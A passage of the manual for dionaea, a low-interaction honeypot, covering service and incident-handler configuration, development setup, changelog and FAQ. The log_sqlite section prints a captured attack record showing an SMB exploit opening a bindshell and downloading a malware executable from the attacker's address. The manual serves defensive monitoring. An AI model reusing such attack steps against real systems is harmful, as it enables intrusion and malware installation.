1114       http://code.mwcollect.org>  low  interaction honeypot too.  Besides the
1115       known attacks on SMB dionaea supports uploading files  to  smb  shares.
1116       Adding new DCE remote procedure calls is a good start to get into dion‐
1117       aea code, you can use:
1118
1119          SELECT
1120                  COUNT(*),
1121                  dcerpcrequests.dcerpcrequest_uuid,
1122                  dcerpcservice_name,
1123                  dcerpcrequest_opnum
1124          FROM
1125                  dcerpcrequests
1126                  JOIN dcerpcservices ON(dcerpcrequests.dcerpcrequest_uuid == dcerpcservices.dcerpcservice_uuid)
1127                  LEFT OUTER JOIN dcerpcserviceops ON(dcerpcserviceops.dcerpcserviceop_opnum = dcerpcrequest_opnum AND dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice )
1128          WHERE
1129                  dcerpcserviceop_name IS NULL
1130          GROUP BY
1131                  dcerpcrequests.dcerpcrequest_uuid,dcerpcservice_name,dcerpcrequest_opnum
1132          ORDER BY
1133                  COUNT(*) DESC;
1134
1135       to identify potential usefull targets of unknown dcerpc calls using the
1136       data  you  gathered  and  stored  in  your logsql database. Patches are
1137       appreciated.
1138
1139   Example config
1140       services/smb.yaml.INDENT 0.0
1141
1142          - name: smb
1143            config:
1144
1145              ## Generic setting ##
1146
1147              # 1:"Windows XP Service Pack 0/1",
1148              # 2:"Windows XP Service Pack 2",
1149              # 3:"Windows XP Service Pack 3",
1150              # 4:"Windows 7 Service Pack 1",
1151              # 5:"Linux Samba 4.3.11"
1152          #    os_type: 2
1153
1154               # Additional config
1155          #    primary_domain: Test
1156          #    oem_domain_name: Test
1157          #    server_name: TEST-SERVER
1158
1159               ## Windows 7 ##
1160          #    native_os: Windows 7 Professional 7600
1161          #    native_lan_manager: Windows 7 Professional 6.1
1162          #    shares:
1163          #      ADMIN$:
1164          #        comment: Remote Admin
1165          #        path: C:\\Windows
1166          #        type: disktree
1167          #      C$:
1168          #        coment: Default Share
1169          #        path: C:\\
1170          #        type:
1171          #          - disktree
1172          #          - special
1173          #      IPC$:
1174          #        comment: Remote IPC
1175          #        type: ipc
1176          #      Printer:
1177          #        comment: Microsoft XPS Document Writer
1178          #        type: printq
1179
1180               ## Samba ##
1181          #    native_os: Windows 6.1
1182          #    native_lan_manager: Samba 4.3.11
1183          #    shares:
1184          #      admin:
1185          #        comment: Remote Admin
1186          #        path: \\home\\admin
1187          #        type: disktree
1188          #      share:
1189          #        coment: Default Share
1190          #        path: \\share
1191          #        type: disktree
1192          #      IPC$:
1193          #        comment: Remote IPC
1194          #        path: IPC Service
1195          #        type: ipc
1196          #      Printer:
1197          #        comment: Printer Drivers
1198          #        type: printq
1199
1200
1201   TFTP
1202       Written to test the udp connection code, dionaea provides a tftp server
1203       on  port 69, which can serve files. Even though there were vulnerabili‐
1204       ties in tftp services, I’m yet to see an automated attack on tftp  ser‐
1205       vices.
1206
1207   Example config
1208       services/tftp.yaml.INDENT 0.0
1209
1210          - name: tftp
1211            config:
1212              root: /var/lib/dionaea/roots/tftp
1213
1214
1215   UPnP
1216   Example config
1217       services/upnp.yaml.INDENT 0.0
1218
1219          - name: upnp
1220            config:
1221              root: /var/lib/dionaea/roots/upnp
1222              # maximum size in kbytes of the request (32MB)
1223              max_request_size: 32768
1224              personality:
1225                # default
1226                cache:    "CACHE-CONTROL: max-age=120\r\n"
1227                st:       "ST: upnp:rootdevice\r\n"
1228                usn:      "USN: uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice\r\n"
1229                server:   "SERVER: Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1\r\n"
1230                location: "LOCATION: http://192.168.0.1:49152/IPMIdevicedesc.xml\r\n"
1231                opt:      "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1232          #      # Samsung TV
1233          #      cache:     "CACHE-CONTROL: max-age=900\r\n"
1234          #      st:        "ST: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
1235          #      usn:       "USN: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
1236          #      server:    "SERVER: SHP, UPnP/1.0, Samsung UPnP SDK/1.0\r\n"
1237          #      location:  "LOCATION: http://192.168.0.10:7677/MainTVServer2\r\n"
1238          #      opt:       "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1239          #
1240          #      # XBOX 360
1241          #      cache:     "CACHE-CONTROL: max-age=1800\r\n"
1242          #      st:        "ST: urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
1243          #      usn:       "USN: uuid:531c567a-8c46-4201-bcd4-09afa554d859::urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
1244          #      server:    "SERVER: Microsoft-Windows/6.3 UPnP/1.0 UPnP-Device-Host/1.0\r\n"
1245          #      location:  "LOCATION: http://192.168.0.10:1055/upnphost/udhisapi.dll?content=uuid:531c567a-8c46-4201-bcd4-09afa554d859\r\n"
1246          #      opt:       "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
1247
1248

LOGGING (IHANDLER)

1250       Getting  a  copy  of  the  malware  is cool, getting an overview of the
1251       attacks run on your sensor is priceless.
1252
1253       dionaea can write information to a text file, but  be  aware,  dionaeas
1254       logging  to  text files is rather chatty, really chatty, and you do not
1255       want to look at the information, if you are not debugging the  software
1256       or writing some new feature for it.
1257
1258       Of  course, you can appy filters to the logging, to limit it to differ‐
1259       ent facilities or levels, but in general you do not want to  work  with
1260       text files.
1261
1262       dionaea  uses  some internal communication system which is called inci‐
1263       dents.  An incident has an origin, which is a string, a path, and prop‐
1264       erties,  which  can be integers, strings, or a pointer to a connection.
1265       Incidents limit to the max, they pass the information required to inci‐
1266       dent  handlers  (ihandler).   An ihandler can register a path for inci‐
1267       dents he wants to get informed about, the pathes are matched in a  glob
1268       like fashion.  Therefore logging information using an ihandler is supe‐
1269       rior to text logging, you get the information you are looking for,  and
1270       can write it to a format you choose yourself.
1271
1272       List of available ihandlers
1273
1274   emuprofile
1275   Example config
1276       ihandlers/emuprofile.yaml.INDENT 0.0
1277
1278          - name: emuprofile
1279
1280
1281   fail2ban
1282   Example config
1283       ihandlers/fail2ban.yaml.INDENT 0.0
1284
1285          - name: fail2ban
1286            config:
1287              downloads: "/var/lib/dionaea/downloads.f2b"
1288              offers: "/var/lib/dionaea/offers.f2b"
1289
1290
1291   ftp
1292   Example config
1293       ihandlers/ftp.yaml.INDENT 0.0
1294
1295          # ftp client section
1296          - name: ftp
1297            config:
1298              # host for active ftp via NAT
1299              # * 0.0.0.0 - the initiating connection ip is used for active ftp
1300              # * not 0.0.0.0 - gets resolved as hostname and used
1301              active_host: "0.0.0.0"
1302
1303              # ports for active ftp; string indicating a range
1304              active_ports: 63001-64000
1305
1306
1307   hpfeeds
1308   Example config
1309       ihandlers/hpfeeds.yaml.INDENT 0.0
1310
1311          - name: hpfeeds
1312            config:
1313              server: "hpfriends.honeycloud.net"
1314              port: 10000
1315              ident: ""
1316              secret: ""
1317              # dynip_resolve: enable to lookup the sensor ip through a webservice
1318              dynip_resolve: "http://hpfriends.honeycloud.net/ip"
1319
1320
1321   log_db_sql
1322       WARNING:
1323          This ihanlder is experimental.
1324
1325       This  incident  handler can write interesting information about attacks
1326       and connections into an SQL database.  It uses  SQLAlchemy  to  support
1327       different databases.
1328
1329   Example config
1330       ihandlers/log_db_sql.yaml.INDENT 0.0
1331
1332          - name: log_db_sql
1333            config:
1334              url: sqlite:////var/lib/dionaea/dionaea.db
1335
1336
1337   log_incident
1338       This  ihandler  can  be used to export incidents in realtime to be pro‐
1339       cessed by external programs.
1340
1341       WARNING:
1342          This ihandler is in pre alpha state  and  it  might  be  changed  or
1343          removed in the future.
1344
1345   Configure
1346       handlers
1347          List of URLs to submit the information to.  At the moment only file,
1348          http and https are supported.
1349
1350   Format
1351          {
1352             "name": "<sensor-name>",
1353             "origin": "<name of the incident>",
1354             "timestamp": "<date in ISO 8601>",
1355             "data": {
1356                "connection": {
1357                   "id": <internal ID>,
1358                   "local_ip": "<local IP>",
1359                   "local_port": <local port>,
1360                   "remote_ip": "<remote IP>",
1361                   "remote_hostname": "<remote hostname if resolvable>",
1362                   "remote_port": <remote port>,
1363                   "protocol": "<protocol>",
1364                   "transport": "<transport tcp|udp>"
1365                }
1366             }
1367          }
1368
1369   Example config
1370       ihandlers/log_incident.yaml.INDENT 0.0
1371
1372          - name: log_incident
1373            config:
1374              handlers:
1375                #- http://127.0.0.1:8080/
1376                - file:///var/lib/dionaea/dionaea_incident.json
1377
1378
1379   log_json
1380       This ihandler can submit information about attacks/connections  encoded
1381       as json.
1382
1383       WARNING:
1384          This  ihandler  is  in  pre  alpha  state and it might be changed or
1385          removed in the near future.
1386
1387   Configure
1388       flat_data
1389          Set to true to flatten object lists.
1390
1391       handlers
1392          List of URLs to submit the information to.  At the moment only file,
1393          http and https are supported.
1394
1395   Format
1396       Format of the connection information:
1397
1398          {
1399              "connection": {
1400                  "local": {
1401                      "address": "<string:local ip address>",
1402                      "port": <integer:local port>,
1403                  },
1404                  "protocol": "<string:service name e.g. httpd>",
1405                  "remote": {
1406                      "address": "<string:remote ip address>",
1407                      "port": <integer:remote port>,
1408                      "hostname": "<string:hostname of the remote host>"
1409                  },
1410                  "transport": "<string:transport protocol e.g. tcp or udp>",
1411                  "type": "<string:connection type e.g. accepted, listen, ...>"
1412              }
1413          }
1414
1415   Example config
1416       ihandlers/log_json.yaml.INDENT 0.0
1417
1418          - name: log_json
1419            config:
1420              # Uncomment next line to flatten object lists to work with ELK
1421              # flat_data: true
1422              handlers:
1423                #- http://127.0.0.1:8080/
1424                - file:///var/lib/dionaea/dionaea.json
1425
1426
1427   log_sqlite
1428       WARNING:
1429          This   ihandler   was  renamed  in  dionaea  0.4.0  from  logsql  to
1430          log_sqlite.
1431
1432       This is what the logsql python script does,  it  is  an  ihandler,  and
1433       writes  interesting incidents to a sqlite database, one of the benefits
1434       of this logging is the ability to cluster incidents based on  the  ini‐
1435       tial attack when retrieving the data from the database:
1436
1437          connection 610 smbd tcp accept 10.69.53.52:445 <- 10.65.34.231:2010
1438           dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' opnum 9
1439           p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1440           profile: [{'return': '0x7c802367', 'args': ['', 'CreateProcessA'], 'call': 'GetProcAddress'},
1441                      ...., {'return': '0', 'args': ['0'], 'call': 'ExitThread'}]
1442           service: bindshell://1957
1443           connection 611 remoteshell tcp listen 10.69.53.52:1957
1444             connection 612 remoteshell tcp accept 10.69.53.52:1957 <- 10.65.34.231:2135
1445               p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1446               offer: fxp://1:1@10.65.34.231:8218/ssms.exe
1447               download: 1d419d615dbe5a238bbaa569b3829a23 fxp://1:1@10.65.34.231:8218/ssms.exe
1448               connection 613 ftpctrl tcp connect 10.69.53.52:37065 -> 10.65.34.231/None:8218
1449                 connection 614 ftpdata tcp listen 10.69.53.52:62087
1450                   connection 615 ftpdata tcp accept 10.69.53.52:62087 <- 10.65.34.231:2308
1451                     p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
1452
1453       Additionally,  you  can  query  the database for many different things,
1454       refer to:
1455
1456       · dionaea sql logging 2009/11/06
1457
1458       · post it yourself 2009/12/08
1459
1460       · sqlite performance 2009/12/12
1461
1462       · virustotal fun 2009/12/14
1463
1464       · Andrew Waite’s Blog for mimic-nepstats.py
1465
1466       for more examples how to make use of the database.
1467
1468   Example config
1469       ihandlers/log_sqlite.yaml.INDENT 0.0
1470
1471          - name: log_sqlite
1472            config:
1473              file: /var/lib/dionaea/dionaea.sqlite
1474
1475
1476
1477   nfq
1478   Example config
1479       ihandlers/nfq.yaml.INDENT 0.0
1480
1481          - name: nfq
1482            # nfq can intercept incoming tcp connections during the tcp handshake
1483            # giving your honeypot the possibility to provide service on
1484            # ports which are not served by default.
1485            # refer to the documentation BEFORE using this
1486            config:
1487              # 0 = DROP
1488              nfaction: 0
1489              throttle:
1490                window : 30
1491                limits:
1492                  total: 30
1493                  slot: 30
1494              timeouts:
1495                server:
1496                    listen: 5
1497                client:
1498                  idle: 10
1499                  sustain: 240
1500
1501
1502   p0f
1503   Example config
1504       ihandlers/p0f.yaml.INDENT 0.0
1505
1506          - name: p0f
1507            config:
1508              # start p0f with
1509              # sudo p0f -i any -u root -Q /tmp/p0f.sock -q -l
1510              path: "un:///tmp/p0f.sock"
1511
1512
1513   store
1514   Example config
1515       ihandlers/store.yaml.INDENT 0.0
1516
1517          - name: store
1518
1519
1520   submit_http
1521   Example config
1522       ihandlers/submit_http.yaml.INDENT 0.0
1523
1524          - name: submit_http
1525            config:
1526                # the url to send the submission requests to
1527                url: "http://example.org/"
1528                # E-Mail (optional)
1529                # email: ""
1530                # username (optional)
1531                # user:
1532                # password (optional)
1533                # pass:
1534
1535
1536   submit_http_post
1537   Example config
1538       ihandlers/submit_http_post.yaml.INDENT 0.0
1539
1540          - name: submit_http_post
1541            config:
1542              submit:
1543                file_upload:
1544                  urls:
1545                    - http://example.org/upload
1546                    - http://example.com/file.php
1547                  field_values:
1548                    submit: "Upload file"
1549                  file_fieldname: upload_file
1550
1551
1552   tftp_download
1553   Example config
1554       ihandlers/tftp_download.yaml.INDENT 0.0
1555
1556          - name: tftp_download
1557
1558
1559   VirusTotal
1560       This ihandler submits the captured malware samples  to  the  VirusTotal
1561       service for further analysis.
1562
1563   Configuration
1564       apikey
1565          The VirusTotal API-Key.
1566
1567       file
1568          SQLite database file used to cache the results.
1569
1570   Example config
1571       ihandlers/virustotal.yaml.INDENT 0.0
1572
1573          - name: virustotal
1574            config:
1575              # grab it from your virustotal account at My account -> Inbox -> Public API
1576              apikey: "........."
1577              file: "/var/lib/dionaea/vtcache.sqlite"
1578
1579

PROCESSORS

1581       Processors  control  the  actions done on the bi-directional streams we
1582       gain when getting attacked, the default is running the emu processor on
1583       them to detect shellcode.
1584
1585   Emu
1586       Use libemu to find and emulate shellcodes.
1587
1588   Configuration
1589   Filter
1590       Only continue with the processing pipeline if all conditions match.
1591
1592   Configuration
1593       protocols
1594          Comma separated list of connection types.
1595
1596       types
1597          Comma separated list of connection types.
1598
1599          · accept - dionaea accepts a new connection from a remote host
1600
1601          · connect - dionaea makes a connection to a remote host
1602
1603   Streamdumper
1604       This  processor  can  dump  a connection as bi-directional stream.  The
1605       dump can be used to replay an attack on ip-level without  messing  with
1606       pcap and tcpreplay.
1607
1608   Configuration
1609       path
1610          Dumps will be created in this directory.
1611

CONTRIBUTING

1613       First of all, thank you for your interest in contributing to dionaea!
1614
1615   Filing bug reports
1616       Bug  reports  are  very  welcome.  Please file them on the GitHub issue
1617       tracker.  Good bug reports come  with  extensive  descriptions  of  the
1618       error and how to reproduce it.
1619
1620   Patches
1621       All patches to dionaea should be submitted in the form of pull requests
1622       to the main dionaea repository, DinoTools/dionaea.  These pull requests
1623       should satisfy the following properties:
1624
1625   Code
1626       · The  pull request should focus on one particular improvement to dion‐
1627         aea.
1628
1629       · Create different pull requests for unrelated features or bugfixes.
1630
1631       · Python code should follow PEP 8, especially  in  the  “do  what  code
1632         around you does” sense.
1633
1634   Documentation
1635       When introducing new functionality, please remember to write documenta‐
1636       tion.
1637
1638   Review
1639       Finally, pull requests must be reviewed before merging.   Everyone  can
1640       perform  reviews;  this  is  a  very valuable way to contribute, and is
1641       highly encouraged.
1642

DEVELOPMENT

1644       dionaea initial development was funded by the Honeynet Project as  part
1645       of  the  Honeynets Summer of Code during 2009.  The development process
1646       is as open as possible.  You can browse the source  online  and  report
1647       bugs on GitHub
1648
1649   Development
1650   Vagrant
1651       Vagrant  can  be  used  to  setup a development environment for dionaea
1652       within minutes.
1653
1654   Install
1655       First install Vagrant and VirtualBox.
1656
1657       If everything has been setup correctly clone the git repository and use
1658       vagrant to bootstrap and start the environment.
1659
1660          $ git clone https://github.com/DinoTools/dionaea.git
1661          $ cd dionaea/vagrant
1662          $ vagrant up
1663
1664       All files will be installed in the /opt/dionaea directory.
1665
1666   Run
1667       Access  the  development  environment,  edit the config files and start
1668       dionaea with the following command.
1669
1670          $ sudo /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1671
1672   Rebuild and test
1673       To rebuild and install dionaea run the flowing commands.
1674
1675          $ cd /vagrant
1676          $ make
1677          $ sudo make install
1678
1679       See Run for more information on how to start dionaea.
1680
1681   Ubuntu 14.04
1682       Instead of using Vagrant you can use a Ubuntu  14.04  system  to  setup
1683       your  development environment.  In this section we will use the scripts
1684       used to setup the Vagrant environment to bootstrap a fresh Ubuntu  sys‐
1685       tem.   If  you  like  you  can follow the ../installation ‘From Source’
1686       guide to setup everything by hand.
1687
1688   Install
1689       First install Ubuntu.
1690
1691       If everything has been setup correctly clone the git repository and run
1692       the bootstrap script.
1693
1694          $ git clone https://github.com/DinoTools/dionaea.git
1695          $ vagrant
1696          $ ./bootstrap.sh
1697
1698       All files will be installed in the /opt/dionaea directory.
1699
1700   Rebuild and test
1701       Rebuild, install and start dionaea from the root of the git repository.
1702
1703          $ make
1704          $ sudo make install
1705          $ sudo /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1706
1707       This can also be done in one line.
1708
1709          $ make && sudo make install && sudo dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1710
1711   Find memory leaks
1712       To  enable AddressSanitizer you have to add the following parameters to
1713       the configure script and rebuild dionaea.
1714
1715          --disable-shared CFLAGS="-fsanitize=address -ggdb" CXXFLAGS="-fsanitize=address -ggdb"
1716
1717       When running dionaea it will print information  about  overfow  errors.
1718       If  you  would  like to stop execution you have to export an additional
1719       environment variable.
1720
1721          export ASAN_OPTIONS='abort_on_error=1'
1722
1723       To get a stacktrace you can use gdb and add  an  additional  breakpoint
1724       break __asan_report_error.
1725
1726       It  is also possible to use asan_symbolize.py python2 script to extract
1727       additional information.
1728
1729          /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg  2>&1 | python asan_symbolize.py
1730
1731   Logging
1732       Logging should be used to report errors and for debugging purposes.  It
1733       must  not be used to report attacks.  Incidents should be used for this
1734       purpose.  For more information have a look at the ihandler section.
1735
1736       Comparison glib2 and Python
1737
1738                                ┌─────────┬──────────┐
1739                                │glib2    │ Python   │
1740                                ├─────────┼──────────┤
1741                                │debug    │ debug    │
1742                                ├─────────┼──────────┤
1743                                │info     │ info     │
1744                                ├─────────┼──────────┤
1745                                │warning  │ warning  │
1746                                ├─────────┼──────────┤
1747                                │critical │ error    │
1748                                ├─────────┼──────────┤
1749                                │error    │ critical │
1750                                └─────────┴──────────┘
1751
1752       WARNING:
1753          In glib2 a critical message means critical warning. But in Python  a
1754          critical message is handled as critical error.
1755
1756       WARNING:
1757          An  error  message in glib2 or a critical message in a Python module
1758          will terminate the program immediately.
1759
1760   Incident
1761       Some of the incidents reported by the dionaea core are listed below.
1762
1763       dionaea.connection.tcp.accept:
1764          A new TCP connection has been accepted by dionaea.
1765
1766       dionaea.connection.tls.accept:
1767          A new SSL/TLS connection has been accepted by dionaea.
1768
1769       dionaea.connection.tcp.connect:
1770          Reporte after dionaea has connection to an external service via TCP.
1771
1772       dionaea.connection.tls.connect:
1773          Reporte after dionaea has connection  to  an  external  service  via
1774          SSL/TLS.
1775
1776       dionaea.connection.udp.connect:
1777          Reporte after dionaea has connection to an external service via UDP.
1778
1779       dionaea.connection.free:
1780          A connection has been closed and freed.
1781
1782       dionaea.connection.tcp.listen:
1783          Fired after a TCP service has been bound and is listening for incom‐
1784          ming connections.
1785
1786       dionaea.connection.tls.listen:
1787          Fired after a SSL/TLS service has been bound and  is  listening  for
1788          incomming connections.
1789
1790       dionaea.connection.tcp.pending:
1791
1792       dionaea.connection.tcp.reject:
1793          A incoming connection has been rejected by the server.
1794
1795       dionaea.connection.link.early:
1796
1797       dionaea.connection.link:
1798          Reported  to  give the log management the chance to link two connec‐
1799          tions.
1800

CHANGELOG

1802   0.8.0 - (master)
1803   0.7.0 - (2018-05-01)
1804       build
1805
1806       · Add initial cmake support
1807
1808       ci
1809
1810       · Add Debian 9
1811
1812       dionaea
1813
1814       · Fix build error with OpenSSL 1.1.0
1815
1816       · Improve OpenSSL 1.1.0 support
1817
1818       · Cleanup connection code
1819
1820       · Enable bistream for SSL/TLS connections (Thanks Aws0mus)
1821
1822       · Fixing chroot bugs (Thanks Michal Ambroz)
1823
1824       doc
1825
1826       · Add additional information
1827
1828       · Doxygen config file for dionaea c core
1829
1830       · Ubuntu 16.04 install instructions
1831
1832       package
1833
1834       · Remove old and deprecated debian package config
1835
1836       python
1837
1838       · Fix typo in config key
1839
1840       · Fix hardcoded python path
1841
1842       · Fix compilation on CentOS7 (Thanks Michal Ambroz)
1843
1844       python/http
1845
1846       · Initial support to handle SOAP requests
1847
1848       python/log_incident
1849
1850       · Improve hash generator
1851
1852       · Fix bug if parent is unknown
1853
1854       · Remove IDs from list if processed
1855
1856       python/mongo
1857
1858       · Initial support to simulate a MongoDB server
1859
1860       python/pyev
1861
1862       · Update from 0.8 to 0.9 to support Python >= 3.6
1863
1864       python/smb
1865
1866       · Add support for WannaCry and SambaCry (Big thanks to gento)
1867
1868       · Add additional config options to change identity
1869
1870       python/util
1871
1872       · Find Download commands for Linux shell
1873
1874   0.6.0 - (2016-11-14)
1875       dionaea
1876
1877       · Fix build for musl lib
1878
1879       doc
1880
1881       · Fix install instructions
1882
1883       · Extend README.md
1884
1885       python/blackhole
1886
1887       · New service/Initial version
1888
1889       python/emu_scripts
1890
1891       · New handler to analyse downloaded scripts
1892
1893       · Detect VBScript and PowerShell
1894
1895       · Limit number of subdownloads
1896
1897       python/http
1898
1899       · Clean up
1900
1901       · Use state vars instead of strings
1902
1903       · Add template support * Jinja 2 template engine * nginx template
1904
1905       python/mysql
1906
1907       · Dump files from SELECT queries
1908
1909       · Extract URLs from functions
1910
1911       · Variable handler
1912
1913       · Support for selecting variables
1914
1915       python/p0f
1916
1917       · Fix decode error
1918
1919       python/pptp
1920
1921       · Fix error if config is empty
1922
1923   0.5.1 - 2016-09-05
1924       dionaea
1925
1926       · Don’t report ‘connection.free’ incident to early to prevent segmenta‐
1927         tion faults
1928
1929   0.5.0 - 2016-08-06
1930       dionaea
1931
1932       · Handle byte objects in incidents
1933
1934       · Bump required Python version from 3.2 to 3.4
1935
1936       python/http
1937
1938       · Detect Shellshock attacks
1939
1940       python/log_incident
1941
1942       · Initial support to export raw incident information
1943
1944       python/log_sqlite
1945
1946       · Log credentials from the ftp service
1947
1948       python/memcache
1949
1950       · Initial support for the memcached protocol
1951
1952       python/pptp
1953
1954       · Clean up
1955
1956       · Handle CallClearRequests packets
1957
1958       · Values  for  hostname, vendor name and firmware revision are now cus‐
1959         tomizable
1960
1961       python/util
1962
1963       · New function to detect shellshock attacks and report detected URLs
1964
1965   0.4.2 - 2016-07-02
1966       doc
1967
1968       · Add information about log levels for developers
1969
1970       python/*
1971
1972       · Replace all critical log messages with error messages
1973
1974       · Catch exceptions in handle_io_in()  and  handle_io_out()  to  improve
1975         stability
1976
1977       · Catch exceptions in incident handlers
1978
1979       python/sip
1980
1981       · Fix error while reading config values
1982
1983       python/upnp
1984
1985       · Fix errors in log messages
1986
1987       more
1988
1989       · Add templates to create issues and merge requests on github
1990
1991   0.4.1 - 2016-06-14
1992       core
1993
1994       · Initialize stdout logger earlier
1995
1996       · Log error,critical and warning by default
1997
1998       python/*
1999
2000       · In glib2 critical is a critical warning
2001
2002       · Add support for exceptions
2003
2004       · Check file path and show warnings
2005
2006       python/log_json
2007
2008       · Add support for flat object lists to work with ELK stack
2009
2010   0.4.0 - 2016-05-31
2011       core
2012
2013       · Replace lcfg with Key-value file parser from glib
2014
2015       ci
2016
2017       · Add build tests for Ubuntu 14.04, Ubuntu 16.04 and Debian 8
2018
2019       doc
2020
2021       · Add initial documentation for missing modules
2022
2023       · Update documentation to reflact config changes
2024
2025       · Add processor documentation
2026
2027       python/*
2028
2029       · Replace lcfg with yaml configs
2030
2031       · Remove deprecated incident handlers (logxmpp, mwserv, SurfIDS)
2032
2033       · Rename incident handlers from logsql to log_sqlite
2034
2035       · Rename incident handlers from uniqdownload to submit_http_post
2036
2037       python/mysql
2038
2039       · Enable processor pipeline
2040
2041   0.3.0 - 2016-03-30
2042       core
2043
2044       · Code clean up (Thanks to Katarina)
2045
2046       · Vagrant based dev environment
2047
2048       · Customize ssl/tls parameters for autogenerated certificates
2049
2050       doc
2051
2052       · Initial version of sphinx based documentation
2053
2054       python/ftp
2055
2056       · Support to customize response messages
2057
2058       · Small fixes
2059
2060       python/hpfeeds
2061
2062       · Initial ihandler support (Thanks to rep)
2063
2064       python/http
2065
2066       · Customize HTTP response headers
2067
2068       · Return HTTP/1.1 instead of HTTP/1.0
2069
2070       python/log_json
2071
2072       · Initial ihandler support
2073
2074       python/mqtt
2075
2076       · Initial protocol support (Thanks to gento)
2077
2078       python/pptp
2079
2080       · Initial protocol support (Thanks to gento)
2081
2082       python/upnp
2083
2084       · Initial protocol support (Thanks to gento)
2085
2086   0.2.1 - 2014-07-16
2087       core
2088
2089       · Support for cython and cython3
2090
2091       · Fixes to build with glib 2.40
2092
2093       · Remove build warnings
2094
2095       · Support libnl >= 3.2.21
2096
2097       python/http
2098
2099       · Fix unlink() calls
2100
2101       python/virustotal
2102
2103       · virustotal API v2.0
2104
2105   0.2.0 - 2013-11-02
2106       Last commit by original authors.
2107
2108   0.1.0
2109       · Initial release.
2110

FAQ

2112       WARNING:
2113          The documentation is work in progress.
2114
2115   Build/Install
2116       I get gcc: command not found?
2117          install gcc..
2118
2119       How to uninstall it?
2120          rm -rf /opt/dionaea
2121
2122       I  get  binding.pyx:…:  undeclared  name  not builtin: bytes during the
2123       python modules build.
2124          Install a recent cython version
2125
2126       I get Python.h not found during compiling cython
2127          Install appropriate headers for your python interpreter
2128
2129       I do not use ubuntu/debian and the  instructions  are  useless  for  me
2130       therefore.
2131          I  use  debian/ubuntu, and therefore I can only provide instructions
2132          for debian/ubuntu, but you are free to send me a diff for your oper‐
2133          ating system
2134
2135       I use Redhat/Centos 5 and the installation is frustrating and a mess as
2136       nothing works.
2137          Thats right, but I did not choose your operating system.  Here is  a
2138          list  of outdated or missing packages for your choosen distribution:
2139          all. Yes, you’ll even have to install glib (you’ll have  2.10  where
2140          2.20  is  required)  from  source.   Getting python3 compiled with a
2141          recent sqlite3 version installed to  /opt/dionaea  requires  editing
2142          the  setup.py file (patch <http://p.carnivore.it/KDIFWt>).  /I expe‐
2143          rienced this wonderful operating system myself … You really have  to
2144          love  your  distro  to stick with it, even if it ships software ver‐
2145          sions your grandma saw released in her youth.  Centos  is  the  best
2146          distro  to change distros.  No matter what you choose, it can’t get
2147          worse./
2148
2149       Unable to build.
2150
2151              ==> default: cp build/*/dionaea/*.so /opt/dionaea/lib/dionaea/python.so
2152              ==> default: cp:
2153              ==> default: target ‘/opt/dionaea/lib/dionaea/python.so’ is not a directory
2154
2155              ==> default: libtool: Version mismatch error.  This is libtool 2.4.6 Debian-2.4.6-2, but the
2156              ==> default: libtool: definition of this LT_INIT comes from libtool 2.4.2.
2157              ==> default: libtool: You should recreate aclocal.m4 with macros from libtool 2.4.6 Debian-2.4.6-2
2158              ==> default: libtool: and run autoconf again.
2159
2160          Try to clean your build environment.
2161
2162          WARNING:
2163              This will remove all ignored and untracked files from the direc‐
2164              tory.  Use –dry-run
2165
2166              git clean -xdf
2167
2168   Run
2169       I  get  OperationalError  at  unable  to  open database file when using
2170       logsqlite and it does not work at all
2171          Read the logsql instructions <#logsql>
2172
2173       I get a Segmentation Fault
2174          Read the segfault instructions <#segfault>
2175
2176       I logrotate, and after logrotate dionaea does not log anymore.
2177          Read the logrotate instructions <#logging>
2178
2179       p0f does not work.
2180          Make sure your have p0f 2.0.8 and dionaea does not listen on ::, p0f
2181          can’t deal with IPv6.
2182
2183       I’m facing a bug, it fails, and I can’t figure out why.
2184          Explain the problem, if I’m interested in the nature of the problem,
2185          as it does not sound like pebcak, I may ask for a  shell/screen  and
2186          have  a  look  myself,  and if it is worth it, you’ll even get a FAQ
2187          entry for some specialties of your OS.
2188
2189       Unable to bind to port after dropping privileges
2190          Dropping privileges and binding to ports lower  than  1024  is  only
2191          support  on  Linux systems.  If some of the optional build dependen‐
2192          cies are missing dionaea might not be able to bind  to  these  ports
2193          too.   After enabling all log levels it should display some log mes‐
2194          sages like in the example below.
2195
2196              [10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
2197              [10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
2198              [10052017 15:58:17] connection connection.c:230: Could not bind 1.2.3.4:21 (Permission denied)
2199
2200          To fix this issue you have to install the kernel  headers  for  your
2201          kernel  and  rebuild  dionaea.  If everything works as it should you
2202          might get log messages like in the example below.   You  might  have
2203          noticed  that  there is now a pchild section.  This means dionaea is
2204          using a child process with extended privileges to bind to the port.
2205
2206              [10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
2207              [10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
2208              [10052017 15::58:17] pchild pchild.c:199: sending msg to child to bind port ...
2209              [10052017 15::58:17] pchild pchild.c:218: child could bind the socket!
2210              [10052017 15::58:17] connection connection.c:316: ip '1.2.3.4' node '1.2.3.4:21'
2211

TIPS AND TRICKS

2213       WARNING:
2214          The documentation is work in progress.
2215
2216   Rotate bistream files
